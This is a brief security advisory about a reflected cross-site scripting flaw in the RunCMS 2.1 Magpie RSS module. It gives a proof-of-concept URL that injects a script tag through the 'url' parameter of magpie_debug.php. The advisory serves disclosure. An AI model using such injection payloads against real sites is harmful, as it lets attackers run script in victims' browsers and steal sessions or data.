Home
Consulting
Advisories
Software
Articles
Contact

RunCMS 2.1 Magpie RSS Module Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in RunCMS 2.1 Magpie RSS Module can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC